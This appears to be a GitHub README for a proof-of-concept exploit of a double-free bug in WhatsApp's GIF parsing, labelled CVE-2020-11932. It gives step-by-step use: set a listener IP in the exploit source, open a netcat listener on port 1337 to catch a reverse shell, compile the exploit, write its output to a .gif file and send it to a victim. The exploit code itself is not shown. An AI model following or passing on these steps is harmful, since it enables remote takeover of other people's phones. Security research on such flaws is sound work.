CVE-2020-11932 - Double-Free bug in WhatsApp exploit POC
https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/.
github.com
#Note: Make sure to set the listner ip in exploit.c inorder to get shell
- nc -lvp 1337 or whatever port.
- and then compile.
- make
- or
- gcc -o exploit egif_lib.c exploit.c
- then run ./exploit and save the content to .gif
- and send to victim.
https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/.
GitHub - ProjectorBUg/CVE-2020-11932: Double-Free BUG in WhatsApp exploit poc.
Double-Free BUG in WhatsApp exploit poc. Contribute to ProjectorBUg/CVE-2020-11932 development by creating an account on GitHub.